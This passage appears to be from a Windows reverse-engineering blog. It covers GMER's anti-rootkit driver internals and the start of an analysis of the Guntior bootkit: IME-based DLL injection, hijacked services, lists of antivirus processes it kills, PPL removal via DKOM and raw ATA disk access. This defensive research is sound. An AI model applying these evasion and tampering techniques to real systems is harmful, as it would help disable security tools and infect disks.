The Disk.sys driver is responsible for dispatching storage device I/O. The client must specify the offset from the beginning of the disk and the data length. The driver in turn redirects this request to one of the corresponding disk port drivers.

We can start by exploring disk device stack and go deeper.

As we can see there are four devices on that device stack.

The first one belongs to the partition manager and presents the device of the raw disk partition. Partmgr forwards the disk I/O request further to the disk driver, providing it an LBA instead of a partition offset.
The second device belongs to the disk driver itself, described above.
The next device was created by the common driver acpi.sys, which essentially just forwards disk I/O requests to the port driver. The responsibilities of Acpi.sys include support for power management and Plug and Play (PnP) device enumeration.
The last one belongs to the iaStorVD disk port driver (Intel Rapid Storage Technology) and is used in many computers with Intel chipsets. Being a disk port driver, it's responsible for low-level communication with a specific storage device type, including initializing the storage controller and identifying and attaching storage devices.

But the whole picture of processing disk requests is a bit more complicated, since there are more drivers that are indirectly involved in it. Let's inspect those driver objects on the disk device stack.

As we can see, both drivers redirect their driver dispatch routines to other drivers. In the case of disk.sys, its table of driver dispatch routines points to Classpnp functions. The driver name stands for "Class Plug and Play Driver" and it is responsible for managing Plug and Play (PnP) devices. Classpnp handles the device requests addressed to disk.sys. classpnp!ClassGlobalDispatch, in turn, simply redirects the execution flow to the appropriate classpnp dispatch function. Therefore, these items of the disk driver dispatch table are perfect targets for any rootkit (if it can defeat PatchGuard first).

If we know the pointer to the disk device object, we can get information about the real dispatch table of the classpnp driver.

The second driver iaStorVD.sys relies on its counterpart storport.sys. The latter is a general-purpose storage driver responsible for managing communication between storage devices and the operating system itself. While iaStorVD.sys provides functionality for managing RAID arrays and handling I/O requests for devices connected to the Intel RAID controller, storport.sys is directly responsible for communication with storage devices. Thus, Storport.sys operates at a lower level than iaStorVD.sys, providing basic communication and data transfer functionality with the storage hardware.

iaStorVD.sys also creates one more device incorporated in another device stack that ends up in Pci.sys. It's used to handle requests for the PCI bus driver Pci.sys.

🛠️ Patching kernel data

GMER aims to patch kernel mode code and disk port driver data in two cases mentioned below. In both of them, it is interested in intercepting control of the disk I/O operation before the disk port driver returns control to the client. The driver parses the SCSI_REQUEST_BLOCK structure and, in particular, its Cdb structure to obtain information about the LBA and the size of the requested data.

The anti-rootkit driver overwrites the IAT entry of the disk port driver that matches the IofCompleteRequest function with a GMER's one.
It also implements run-time code patching. The first 0xF bytes of ataport!IdePortDispatch->ataport!IdePortPdoDispatch are subject to this modification in the case of a sector write operation.

GMER puts the following instruction at the beginning of ataport!IdePortPdoDispatch. A pointer to its implementation of IofCompleteRequest follows the instruction.

While the address of ataport!IdePortDispatch can simply be obtained from the driver's dispatch function table, to find the address of ataport!IdePortPdoDispatch GMER needs to check the body of the first function for a specific signature chain. This signature chain is presented below.

Below you can see part of the code that implements the interception of the ataport!IdePortPdoDispatch function. The first call is used to modify that function and copy the old 0xF bytes. The second one saves the copied old bytes to the global driver data.

It's worth noting that the GMER function for patching kernel mode code isn't safe for use in multiprocessor systems (SMP). Instead of raising IRQL on all CPUs, the driver does this only on the current one. GMER implements a typical method for patching kernel mode data as follows.

🔑 Securing disk I/O operations

The driver provides GMER with the ability to work with the disk at a low level by directly addressing the Atapi/Ataport or Scsiport disk drivers. It builds a request packet and sends it to one of them through the IRP_MJ_INTERNAL_DEVICE_CONTROL request, depending on which one is active in the system.

The driver receives the name of the disk device object from its user-mode counterpart. Before sending a request to the disk device, the driver obtains the pointer to the lowest device on the stack using IoGetBaseFileSystemDeviceObject, thus bypassing all potentially untrusted devices.

struct _CDB10 {
    UCHAR OperationCode;
    ...
    UCHAR LogicalUnitNumber : 3;
    UCHAR LogicalBlockByte0;
    UCHAR LogicalBlockByte1;
    UCHAR LogicalBlockByte2;
    UCHAR LogicalBlockByte3;
    ...
    UCHAR Control;
} CDB10, *PCDB10;
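To show how the LBA and the request size can be recovered from such a command block, here is a minimal Python sketch. It assumes the standard 10-byte SCSI READ(10)/WRITE(10) layout: the operation code in byte 0, a big-endian 32-bit LBA in bytes 2-5 (LogicalBlockByte0 is the most significant byte) and a big-endian 16-bit block count in bytes 7-8. The function name and the sample CDB are hypothetical.

```python
import struct

SCSIOP_READ = 0x28   # READ(10)
SCSIOP_WRITE = 0x2A  # WRITE(10)


def parse_cdb10(cdb: bytes):
    """Return (opcode, lba, block_count) from a 10-byte SCSI command block."""
    if len(cdb) < 10:
        raise ValueError("CDB10 must be at least 10 bytes long")
    # B: opcode, B: flags/LUN, I: LBA, B: reserved, H: block count, B: control
    opcode, _flags, lba, _reserved, blocks, _control = struct.unpack(">BBIBHB", cdb[:10])
    return opcode, lba, blocks


if __name__ == "__main__":
    sample = bytes([SCSIOP_READ, 0, 0x00, 0x00, 0x08, 0x00, 0, 0x00, 0x10, 0])
    opcode, lba, blocks = parse_cdb10(sample)
    print(hex(opcode), hex(lba), blocks)
```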

Before calling the disk driver, GMER patches its IAT entry matching the IofCompleteRequest function to GMER's one.

GMER supports IOCTL code 0x7201C008 to perform secure disk I/O operation for its user-mode application. Below you can see its pseudo code, which omits minor operations.

GMER has several I/O completion routines that are designed to be used in multiple anti-rootkit scenarios when processing disk I/O operations.

The first is used to secure (intercept) the disk read operation (IRP_MJ_INTERNAL_DEVICE_CONTROL, SCSIOP_READ) globally (IOCTL 0x7201C020). Its pointer replaces IofCompleteRequest in the disk port driver IAT entry and is used to copy read data from the system buffer to the GMER's one.
Another one is involved in securing the disk write operation (IRP_MJ_INTERNAL_DEVICE_CONTROL, SCSIOP_WRITE) globally (IOCTL 0x7201C02C). The driver uses a pointer to this function in the patching code for ataport!IdePortPdoDispatch. This routine is used to prohibit write access to disk sectors (LBA) supplied from user mode.
The last one is used to dispatch the initiated disk I/O request coming from the GMER app (IOCTL 0x7201C008).

In addition to those IOCTLs, GMER has a feature to scan the classpnp handlers for potential run-time hooks (0x9876C058). The driver obtains the handler offset inside the classpnp driver file, its SYSTEM_MODULE_ENTRY.ImageBase, and checks its prologue for two signature sequences: 0x55 0x8B 0xEC, 0x8B 0xFF 0x55.

But it's unclear why the 64-bit GMER driver checks the classpnp dispatch functions for x86 instructions...

🗃️ Securing file I/O operations

GMER secures file operations as follows.

To open a file, the driver calls the IoCreateFileSpecifyDeviceObjectHint API, sending a request directly to the FSD, skipping possible intermediate filters. To obtain a pointer to the FSD device object that is the lowest on the stack, it uses IoGetBaseFileSystemDeviceObject (IoGetDeviceAttachmentBaseRef).
If the function fails, GMER tries to check IofCallDriver for hooks, but only its old version, which has a jump instruction to the IopfCallDriver pointer at the beginning.
In addition to checking IofCallDriver for hooks, the driver also checks and restores the original IRP_MJ_CREATE handlers for Ntfs and Fastfat driver objects. As was mentioned above, GMER obtains these handlers at the driver initialization phase.
After obtaining a handle to the requested file, the driver uses the ordinary APIs ZwReadFile, ZwWriteFile, ZwDeleteFile, ZwQueryInformationFile, ZwSetInformationFile, ZwClose.

These operations are performed in the System process context.

The following pseudocode demonstrates how GMER secures file I/O operations.

⛓️Tracing kernel mode code

Along with information about system anomalies, GMER is also capable of providing details about possible code execution flow violations involved in processing file system operations. This feature is based on code tracing, or single-step CPU mode, in which the driver code intercepts control after each executed CPU instruction and saves information about the system module to which this instruction belongs. This mode is activated by setting the trap flag in the RFLAGS register {pushfq; pop rax; or eax, 100h; push rax; popfq}.

Below you can see the driver code responsible for intercepting the int 1 handler and the corresponding x64 structures.

The driver interrupt handler is simply a wrapper: it prepares the necessary data on the stack and calls the real handler.

When tracing code, the driver maintains a context structure with several arrays that store information about system modules and their call stack frames. Then this data will be copied to the provided user buffer and analyzed by the application for the presence of unknown system modules.

The driver single step mode dispatch function looks as follows.

The above function is involved in code tracing in two scenarios - calling the FSD driver directly via IofCallDriver and ZwQueryDirectoryFile.

The second scenario.

📦About PPL'ed processes

PPL is a widely known built-in Windows security feature designed to provide high-end protection for trusted Windows services such as anti-malware processes. It's recognized as a robust security measure aimed at protecting running processes from any form of modification or other destructive impact. Access checks for PPL-protected processes are implemented at the opening process handle level, without any exceptions for kernel mode code. As a result, these processes cannot be terminated using ZwOpenProcess and ZwTerminateProcess calls made by the kernel mode driver.

The required access checks can only be passed by code running at an equal or higher PPL protection level. GMER isn't an exception; like other renowned security tools, including Process Explorer, Process Hacker, System Informer and WinArk, it can't terminate PPL'ed processes. This limitation arises not only because it employs a simple trick involving the pair of aforementioned functions after attaching to the System process, but also because of its constraints when working on modern Windows versions. To terminate a PPL-protected process, kernel mode code requires a pointer to the kernel object of the process and a pointer to an internal ntoskrnl function, PspTerminateProcess, which terminates a process by pointer rather than by handle.

GMER terminates the process as shown below (IOCTL 0x9876C094).

To make the process of finding PspTerminateProcess more reliable across Windows versions, a signature chain candidate should consist of unique byte sequences. GMER can easily find many undocumented Windows kernel functions, so locating PspTerminateProcess shouldn't be difficult for it.

If we delve deeper, we find that the key function in the process of checking PPL protection is the open procedure for the process object type (PsProcessType), called PspProcessOpen. Its only purpose is to compare the PS_PROTECTION values of both processes. Before PPL was implemented, the process kernel object didn't have an open procedure.

Below, you can see the process of obtaining a handle to the PPL'ed process, starting with the call of NtOpenProcess and ending with the actual validation of the protection.

Removing PPL protection can be reduced to zeroing the EPROCESS_Protection value that the Windows kernel uses to set the corresponding level of protection. This is a DKOM technique, and there are several projects on GitHub demonstrating it. It can also be used by attackers or defenders for the opposite purpose: to enable protection for specific processes, making them inaccessible to any kind of modification. Below you can see the corresponding structures describing PPL.

To disable PPL, the protection byte or all three fields should be set to zero (see Kernel Driver Utility, KDU).
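The three fields packed into the protection byte can be decoded with a few shifts. The sketch below assumes the layout published in public Windows symbols (Type in bits 0..2, Audit in bit 3, Signer in bits 4..7); the type and function names are mine, and the code only interprets a byte value without touching any process.

```c
#include <stdint.h>

/* Decoded view of the one-byte protection level. */
typedef struct {
    unsigned type;    /* bits 0..2: 0 = none, 1 = protected light (PPL), 2 = protected */
    unsigned audit;   /* bit 3 */
    unsigned signer;  /* bits 4..7: e.g. 3 = Antimalware, 6 = WinTcb */
} ps_protection_fields;

/* Split the protection byte into its three bit fields. */
ps_protection_fields decode_protection(uint8_t level)
{
    ps_protection_fields f;
    f.type   = level & 0x07u;
    f.audit  = (level >> 3) & 0x01u;
    f.signer = (level >> 4) & 0x0Fu;
    return f;
}

/* Pack the three fields back into a single byte. */
uint8_t encode_protection(unsigned type, unsigned audit, unsigned signer)
{
    return (uint8_t)((type & 0x07u) |
                     ((audit & 0x01u) << 3) |
                     ((signer & 0x0Fu) << 4));
}
```

For example, the value 0x31 decodes to Type = 1 and Signer = 3, i.e. a PPL process with the Antimalware signer, while 0x00 means all three fields are cleared and the process is unprotected.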

To enable protection for the process (EDRSandblast).

The following projects on GitHub demonstrate this trick of disabling PPL protection using DKOM, i.e. manually changing EPROCESS_Protection. In addition, from a blog post by Denis Skvortcov, we can learn that Avast security products set protection for their anti-malware services by manually PPL'ing the corresponding process.

https://github.com/Mattiwatti/PPLKiller

https://github.com/hfiref0x/KDU

https://github.com/wavestone-cdt/EDRSandblast/

The latter tool was reportedly utilized by the Midnight Blizzard threat actor to disable the protection of an installed anti-malware product. It's also capable of enabling protection for the current process. To read and write kernel memory, this tool requires a vulnerable driver (the BYOVD technique). As opposed to EDRSandblast, KDU comes with numerous vulnerable drivers, so you don't need to find one yourself.

References

https://www.crowdstrike.com/blog/evolution-protected-processes-part-2-exploitjailbreak-mitigations-unkillable-processes-and/

https://www.alex-ionescu.com/146/

https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/srb/ns-srb-_scsi_request_block

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a

↧

Guntior - the story of an advanced bootkit that doesn't rely on Windows disk drivers

April 14, 2024, 11:32 am

I first stumbled upon this interesting malware sample about a decade ago, when I was a contributor to the kernelmodeinfo forum. Amid the rise of bootkits at that time, the dropper was captured in the wild and posted on one of the malware trackers. The malware was called "Guntior", after the device object its authors had chosen for it (\Device\Guntior). The name also appears in AV detections.

At that time, most systems were x86, and thus didn't benefit from Kernel Patch Protection (KPP) or Driver Signature Enforcement. As a result, there was a lot of sophisticated malware loading unsigned drivers that used kernel mode hooks and direct disk access to hide malicious activity. Bootkits typically store their components in disk sectors outside the normal file system and conceal their data from the rest of the operating system by returning zeroes or spoofed data in response to any requests for it.

The analysis of any bootkit involves not only reverse engineering skills, but also forensic skills in order to extract the infected boot sector, MBR and malware modules from disk sectors.

Chapters:

The dropper
HIPS evasion
Disabling security software
Driver installation
Payload DLL
A few words about the Windows disk I/O subsystem
Low-level disk access via ATA PIO mode
Disk infection
Bootloader
Key takeaways
Appendix

The dropper

Okay, let's take a look at the dropper. The bootkit itself is encrypted and stored in the resources section of the malware dropper. The latter is wrapped in another dropper, which appears to have been downloaded by the user. Along with the bootkit, the resources section also incorporates other encrypted malware modules.

The bootkit dropper has several anti-debug and anti-analysis tricks to confuse a malware researcher. Its Original Entry Point (OEP) is called via a Structured Exception Handling (SEH) handler upon throwing an exception. To confuse a potential researcher, the dropper creates a copy of itself on disk and converts this executable into a DLL. This trick is also used to bypass HIPS sensors and is explained later. After performing these anti-analysis tricks, it proceeds with execution.

HIPS evasion

The malware performs an interesting trick to inject its DLL into Explorer, which works on older versions of Microsoft Windows. This technique allows the malware to bypass HIPS checks and behavioral protection designed to detect malicious activity. In a nutshell, the malware itself doesn't inject the DLL into the target process, but causes the OS to do so.

The trick is based on the Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into a process by sending it the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL that is assumed to implement this keyboard layout in a special registry key. This registry key should store a value named "Ime File" with the DLL path, but writing a file path to the registry would trigger an alert from any behavioral protection. To avoid this, the malware intercepts the NtQueryValueKey API to provide the necessary DLL path. There's another important API in the event chain: ImmLoadLayout. It loads the malicious DLL in the context of the Explorer process after the aforementioned message is received.

Before doing these actions, the malware copies its executable to the system directory under a random name with the .tmp extension and patches its PE characteristics by setting the corresponding DLL flag, effectively converting it into a DLL. As you might guess, this DLL is intended to be injected into Explorer as explained above.

Let's sum up this injection technique:

The malware copies its executable to the temp directory as a DLL.
It registers a new keyboard layout in the registry.
It intercepts ZwQueryValueKey in its own process to supply the "Ime File" registry value with the malware DLL path to the OS.
It gets a handle to the Explorer window with FindWindow.
It sends the WM_INPUTLANGCHANGEREQUEST message to that window.
The OS calls the ZwQueryValueKey hook to query the "Ime File" value of the newly registered keyboard layout and gets the DLL path.
Windows caches information about this keyboard layout.
The malware sends the WM_INPUTLANGCHANGEREQUEST message again.
ImmLoadLayout loads the DLL into the Explorer process using the cached data.

Created keyboard layout data.

The following diagram explains this trick.

Disabling security software

Upon its successful execution, the DLL code sets an event to signal the dropper. This injected DLL is responsible for loading the bootkit driver, but before doing this, it tries to disable the following tools by sending the appropriate IOCTLs to their drivers or killing their processes.

360tray.exe, 360 Total Security by Qihoo 360
HintClient.exe by Shanghai Hintsoft Co., LTD, IOCTL code 0x00403A3B.
DrvMon tool by Fyyre and EP_X0FF, IOCTL code 0x00403B0A.
HardwareInfo.exe, part of the NetTools, IOCTL code 0x00220008.
CfgClt.exe
AVP.exe, Kaspersky security products
KSafeTray.exe, PC Doctor Flow Monitor (PC Doctor) by Kingsoft
RavMonD.exe, Rising AntiVirus by Beijing Rising Information Technology

For example, below you can see the code to disable DrvMon.

The bootkit is particularly interested in disabling ESET security products. It creates a separate thread in which it tries to terminate the nod32krn.exe service in an infinite loop with a timeout of two seconds. To ensure that the process is killed, the driver is used.

Driver installation

Another interesting characteristic of this malware is how it installs and loads its driver. This tricky method is based on hijacking the Microsoft Trusted Audio Drivers service named drmkaud (drmkaud.sys) and utilizing PnP Manager to load it. To install the driver, the malware performs the following actions.

Selects a random name for its driver to be dropped into C:\Windows\System32.
Opens the registry key of Trusted Audio Drivers in HKLM\SYSTEM\CurrentControlSet\Enum\SW belonging to Device Manager with the full path HKLM\SYSTEM\CurrentControlSet\Enum\SW\GUID\GUID\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641}. These GUIDs are stored in encrypted form.
Modifies the security descriptor allowing Everyone all access to those keys.
Sets ConfigFlags value to zero, replaces the original name of the service drmkaud with the malware's.
Creates the driver service key in HKLM\SYSTEM\CurrentControlSet\Services.
Extracts the driver from the resources section, decrypts it and drops it onto disk.

The Trusted Audio Drivers service in the Enum key is hijacked so that its GUID can be used to load the malicious driver via the PnP Manager. The malware repeatedly tries to open a device named \Device\000000NN, incrementing the NN value each time until it succeeds. To each device the code sends a special IOCTL code supplying the aforementioned GUID, which is stored in encrypted form.

If this trick fails, the malware loads the driver as usual, manually creating its service. Once it's loaded, the malware starts infecting the disk.

Payload DLL

The dropper uses a similar trick to register the payload DLL in the system. Instead of simply dropping the DLL and registering it in autorun, it hijacks one of the standard Windows services by overwriting its executable with the malware DLL. To hinder analysis, the malware stores the list of these DLL names in encrypted form and decrypts them only briefly on the stack, making it unlikely that an analyst will find these names in a memory dump.

Trying to hijack at least one of them, the malware targets the following Windows services:

AppMgmt - Software Installation Service
BITS - Background Intelligent Transfer Service
FastUserSwitchingCompatibility - Fast User Switching Compatibility service
WmdmPmSN - Portable Media Serial Number Service
xmlprov - Network Provisioning Service
EventSystem - Event System service
Ntmssvc - Removable Storage Service
upnphost - Universal Plug and Play Device Host Service
SSDPSRV - Simple Service Discovery Protocol service
Netman - Network Connections service
Nla - Network Location Awareness Service
Tapisrv - Telephony service
Browser - Browser service
CryptSvc - Cryptographic Services
helpsvc - Help Center Service
RemoteRegistry - Remote Registry service
Schedule - Schedule service

Below you can see the steps of this process. Before rewriting the system executable, the malware gets the address of SfcFileException export function in sfc_os.dll. Sounds familiar, right? This DLL implements the Windows System File Checker (SFC) API that can be used to scan or restore corrupted system files. The malware authors abuse one of these API functions to prevent SFC from automatically restoring the target system file after its modification.

The hijacked service DLL is responsible for communication with the driver, supplying it with pointers to undocumented ntoskrnl functions and kernel structure offsets, saving the driver from having to do it in kernel mode. The first IOCTL to be sent to the driver is 0x222440, which initializes it for further operation. The following data is to be sent.

Addresses of the following functions: MmGetSystemRoutineAddress, PspTerminateThreadByPointer, KeInsertQueueApc, KiInsertQueueApc;
The first 12 bytes (the prologue) of each of those functions, including PspTerminateThreadByPointer;
Offsets of the following kernel structure fields: EPROCESS->ThreadListHead, ETHREAD->ThreadListEntry.

When the malware needs to terminate a specific process, it sends a special IOCTL containing the PID. The driver gets the EPROCESS pointer for this PID, enumerates all threads belonging to this process using the supplied offsets of EPROCESS->ThreadListHead and ETHREAD->ThreadListEntry, and calls PspTerminateThreadByPointer for each of them.
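The offset-based enumeration is a plain intrusive-list walk. The following user-mode simulation shows only that traversal pattern: mock_process, mock_thread, sum_tids and for_each_thread are hypothetical stand-ins, and the callback merely records thread IDs where the driver would act on each thread object.

```c
#include <stddef.h>
#include <stdint.h>

/* Doubly linked list node with the same shape as the kernel's LIST_ENTRY. */
typedef struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
} list_entry;

/* Mock objects standing in for EPROCESS and ETHREAD. */
typedef struct { int pid; list_entry thread_list_head;  } mock_process;
typedef struct { int tid; list_entry thread_list_entry; } mock_thread;

typedef void (*thread_callback)(void *thread, void *ctx);

/* Walk the circular list whose head lives at `process + head_off`.
 * Every node is embedded at `entry_off` inside a thread object, so
 * subtracting that offset recovers the object (CONTAINING_RECORD).
 * Returns the number of threads visited. */
size_t for_each_thread(void *process, size_t head_off, size_t entry_off,
                       thread_callback cb, void *ctx)
{
    list_entry *head = (list_entry *)((uint8_t *)process + head_off);
    size_t visited = 0;
    for (list_entry *e = head->flink; e != head; e = e->flink) {
        void *thread = (uint8_t *)e - entry_off;
        if (cb)
            cb(thread, ctx);
        visited++;
    }
    return visited;
}

/* Example callback: accumulate thread IDs into an int. */
void sum_tids(void *thread, void *ctx)
{
    *(int *)ctx += ((mock_thread *)thread)->tid;
}
```

Passing the offsets in from user mode, as the DLL does, is what lets the same driver binary work across kernel builds where these field offsets differ.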

The DLL contains an impressive list of processes to be terminated. Some of them belong to well-known security companies.

ESET - nod32krn.exe, egui.exe, ekrn.exe;
Qihoo 360 - 360tray.exe, 360leakfixer.exe, 360Safe.exe, safeboxTray.exe, 360safebox.exe, 360sd.exe, ZhuDongFangYu.exe, 360rp.exe, 360sdupd.exe;
Kingsoft WebShield - KSWebShield.exe, kxesapp.exe, kxeserv.exe, kwstray.exe, kxedefend.exe, upsvc.exe, kxescore.exe, KVExpert.exe, kxetray.exe, KSafeSvc.exe, KSafeTray.exe;
Rising AntiVirus - RavMonD.exe, RsTray.exe, RsAgent.exe, RegGuide.exe, RsMain.exe, RsCopy.exe, Rav.exe;
Jiangmin Antivirus - KVSrvXP.exe, KVExpert.exe, KVMonXp.exe;
Kaspersky - AVP;
Rising PC Doctor - ras.exe, knownsvr.exe, rstray.exe;
Tencent QQPCMgr - QQPCLeakScan.exe, QQPCWebShield.exe, QQPCTAVSrv.exe, QQPCRTP.exe, QQPCMgr.exe, QQPCUpdateAVLib.exe, QQPCTray.exe, QQRepair.exe, QQPCPatch.exe;
Other - Calc.exe (:D), guiyingfix.exe, knsdtray.exe, knsd.exe, knsdsvc.exe, knsdsve.exe.

Another interesting observation is that, before calling the undocumented function pointers passed from user mode, the driver first tries to restore the first 12 bytes of each function. The authors probably assumed that the drivers of some security products hook these functions by patching their first bytes at runtime. The DLL provides the driver with these original 12 bytes: it loads a copy of ntoskrnl from disk into its own process, locates the undocumented functions there, i.e. PspTerminateThreadByPointer and KeInsertQueueApc, and copies their prologues. The screenshot below demonstrates this technique.

The code above walks through the list of all processes' threads as follows.

Now we can take a look at the entire malware installation routine.

The DLL is a core part of the malware, which acts as a bot and communicates with its control server. The address is hard coded in the DLL. After connecting to 183[.]60[.]132[.]220, it tries to download one of the executable files with the names 1.exe, 2.exe, 3.exe, ..., 32.exe and run it in the system with the Explorer access token. Unlike TDL4, this bootkit isn't interested in protecting downloaded executables on disk. They are stored as regular files on the volume and the bootkit doesn't restrict access to them.

A few words about the Windows disk I/O subsystem

As an OS built on a hybrid kernel architecture, Windows has a multi-layered disk I/O architecture. It's based on the device stack model, where each layer is represented by a separate kernel mode driver. One of the main advantages of this approach is that each of these layers is isolated from the others and can use the unified interfaces of the Windows I/O subsystem to communicate with other drivers on the stack. For example, the File System Driver (FSD) can dynamically attach its device to the existing disk device stack to dispatch file operations.

At the top of this device stack is the FSD (ntfs.sys), which handles file operations and attaches its device to the lower one belonging to the volume manager (volmgrx.sys). To operate on file data, the FSD converts file offsets to volume offsets and passes the request to volmgrx.sys. The latter converts its offsets to disk offsets and calls the disk driver disk.sys, or it can reach out to the partition manager (partmgr.sys), which is also located further down the device stack. Unlike the device belonging to the volume manager, the partition manager's device represents a raw disk partition without a file system. Upon receiving a request, disk.sys calls the disk port driver atapi.sys, specifying exactly which device on the ATA bus it needs to reach. The disk port driver completes this request by communicating directly with the disk controller. The major difference between the FSD and other drivers on the stack is that the former has to keep the context for every open file (FILE_OBJECT and its FsContext) while the others simply operate with disk or volume offsets.
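The offset translations performed along the stack boil down to simple arithmetic. Here is a simplified sketch with hypothetical function names, assuming 512-byte sectors and a file stored in one contiguous extent; real NTFS files can be fragmented into many runs.

```c
#include <stdint.h>

#define SECTOR_SIZE 512u

/* FSD level: file offset -> volume offset, for a file whose data
 * starts at logical cluster `start_lcn` (single-extent assumption). */
uint64_t file_to_volume_offset(uint64_t file_off, uint64_t start_lcn,
                               uint32_t cluster_size)
{
    return start_lcn * cluster_size + file_off;
}

/* Volume manager level: volume offset -> disk offset, given the
 * first sector of the partition that backs the volume. */
uint64_t volume_to_disk_offset(uint64_t vol_off, uint64_t partition_start_lba)
{
    return partition_start_lba * SECTOR_SIZE + vol_off;
}

/* Disk level: byte offset -> sector number (LBA). */
uint64_t disk_offset_to_lba(uint64_t disk_off)
{
    return disk_off / SECTOR_SIZE;
}
```

With 4 KB clusters, a file starting at LCN 10 on a partition that begins at sector 2048 has its byte 0x100 in disk sector 2128.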

The driver objects of the aforementioned drivers were an attractive target for rootkits and bootkits in the x86 era. The malicious Ring 0 code modified the function pointers in the drivers' dispatch tables to intercept the I/O operations of interest. IRP_MJ_READ, IRP_MJ_WRITE and IRP_MJ_DEVICE_CONTROL were the primary targets. Thus, rootkit detectors had to go as low as possible to safely read disk sectors, skipping potentially infected drivers located higher on the stack.

Low-level disk access via ATA PIO mode

The rootkit includes a unique feature we haven't seen in other notorious bootkits such as TDL4, Rovnix or Mebroot. It's capable of communicating with the hard drive at the lowest level without calling any Windows disk or disk port drivers (disk.sys, atapi.sys).

In a nutshell, instead of sending the IOCTL_SCSI_PASS_THROUGH_DIRECT request to atapi, the rootkit works directly with the ATA bus via IO ports 0x170-0x177 and a device control register port such as 0x376. Once all the preparations are done, the rootkit calls hal!READ_PORT_BUFFER_USHORT to read data from disk or hal!WRITE_PORT_BUFFER_USHORT to write to it. At the beginning of this routine, the rootkit queries the information about the IDE controller using hal!HalGetBusData for PCIConfiguration.

Despite having this interesting feature, the malware uses it in only two cases, neither of which requires calculating disk offsets from the partition table.

To overwrite the MBR and drop the malware components onto the end of the disk during the disk infection process.
To read the MBR every 5 seconds in an infinite loop from the disk infection watchdog thread.

The disk infection routine is located in the main dropper and called in the context of the Windows Explorer process after code injection is done as described above. If the injection fails, the dropper calls this function in the context of its own process.

The rootkit provides the malware with two disk communication IOCTLs. The first is used to select the drive on which the malware wants to perform the RW operation and the second describes the request itself.

The rootkit uses the following ATA commands.

0x30 and 0x34 to write sectors in 28/48 bit PIO mode;
0x20 and 0x24 to read sectors;
0xEC - IDENTIFY command.

Before execution of any disk operation, the rootkit polls the drive to be sure that it's ready to transfer data.
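Polling usually means reading the ATA status register (command base + 7) until BSY clears and DRQ is set. The sketch below follows the status bits described on the OSDev ATA PIO page; the read_status_fn callback and the scripted_status mock are hypothetical, so the logic can be exercised without touching real I/O ports.

```c
#include <stdint.h>

/* ATA status register bits. */
#define ATA_SR_ERR 0x01  /* error */
#define ATA_SR_DRQ 0x08  /* data request: ready to transfer */
#define ATA_SR_DF  0x20  /* drive fault */
#define ATA_SR_BSY 0x80  /* busy */

typedef uint8_t (*read_status_fn)(void *ctx);

/* Poll until the drive is ready to transfer data.
 * Returns 0 when ready, -1 on drive error, -2 on timeout. */
int ata_wait_drq(read_status_fn read_status, void *ctx, unsigned max_polls)
{
    for (unsigned i = 0; i < max_polls; i++) {
        uint8_t st = read_status(ctx);
        if (st & ATA_SR_BSY)
            continue;                    /* other bits are invalid while busy */
        if (st & (ATA_SR_ERR | ATA_SR_DF))
            return -1;
        if (st & ATA_SR_DRQ)
            return 0;
    }
    return -2;
}

/* Mock status source that replays a fixed sequence of values and
 * then keeps returning the last one. */
typedef struct {
    const uint8_t *values;
    unsigned count;
    unsigned pos;
} scripted_status;

uint8_t scripted_read(void *ctx)
{
    scripted_status *s = (scripted_status *)ctx;
    uint8_t v = s->values[s->pos];
    if (s->pos + 1 < s->count)
        s->pos++;
    return v;
}
```

In a real driver the callback would wrap a port read of the status register, for example port 0x177 on the secondary channel.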

Before the IOCTL_ROOTKIT_READ_WRITE_DISK operation can be used, the rootkit requires another IOCTL, named IOCTL_ROOTKIT_SEND_MBR_SIGNATURE, to be sent first. The latter is needed to prepare the rootkit's internal structure for performing further I/O. This structure includes the following information: ATA bus port number, device control port number, ATA command type (28-bit or 48-bit). The rootkit stores this structure globally to supply the disk I/O functions with the information required to perform I/O operations.

In order to get the necessary disk configuration information, the rootkit uses HalGetBusData with PCIConfiguration value as BusDataType and receives the PCI_COMMON_HEADER structure as output. In a loop, it iterates buses, slots, PCI classes, and subclasses until it gets PCI_CLASS_MASS_STORAGE_CTLR and PCI_SUBCLASS_MSC_IDE_CTLR. The implementation of the entire process of searching a specific drive is presented below.

From the rootkit code.
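Independently of the rootkit's own code, the class and subclass test on a PCI configuration header can be sketched as follows. The byte offsets are those of the standard PCI common header and the legacy port numbers are the conventional compatibility-mode ones; the function names are hypothetical.

```c
#include <stdbool.h>
#include <stdint.h>

#define PCI_CLASS_MASS_STORAGE_CTLR 0x01
#define PCI_SUBCLASS_MSC_IDE_CTLR   0x01

/* Byte offsets inside the common PCI configuration header. */
enum {
    PCI_OFF_VENDOR    = 0x00,
    PCI_OFF_PROGIF    = 0x09,
    PCI_OFF_SUBCLASS  = 0x0A,
    PCI_OFF_BASECLASS = 0x0B
};

/* True if the header describes a present IDE mass-storage controller. */
bool pci_is_ide_controller(const uint8_t *cfg)
{
    uint16_t vendor = (uint16_t)(cfg[PCI_OFF_VENDOR] |
                                 (cfg[PCI_OFF_VENDOR + 1] << 8));
    if (vendor == 0xFFFF)
        return false;  /* no device in this slot */
    return cfg[PCI_OFF_BASECLASS] == PCI_CLASS_MASS_STORAGE_CTLR &&
           cfg[PCI_OFF_SUBCLASS]  == PCI_SUBCLASS_MSC_IDE_CTLR;
}

/* ProgIf bit 0 (primary) or bit 2 (secondary) set means the channel
 * runs in native PCI mode; clear means legacy compatibility mode. */
bool ide_channel_is_legacy(const uint8_t *cfg, int channel)
{
    uint8_t native_bit = (uint8_t)(channel == 0 ? 0x01 : 0x04);
    return (cfg[PCI_OFF_PROGIF] & native_bit) == 0;
}

/* Conventional legacy port bases for channel 0 (primary) or 1 (secondary). */
void ide_legacy_ports(int channel, uint16_t *cmd_base, uint16_t *ctl_port)
{
    *cmd_base = (uint16_t)(channel == 0 ? 0x1F0 : 0x170);
    *ctl_port = (uint16_t)(channel == 0 ? 0x3F6 : 0x376);
}
```

For the secondary channel in compatibility mode this yields the 0x170 command block and the 0x376 control port mentioned earlier.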

Now the malware can use IOCTL_ROOTKIT_READ_WRITE_DISK to write data to disk. Depending on the output of the IDENTIFY ATA command, the rootkit selects the appropriate type of RW operation, 28-bit or 48-bit PIO (IDENTIFY_DEVICE_DATA.CommandSetSupport.BigLba). Let's look at the sequence of actions when processing a 48-bit PIO RW operation.
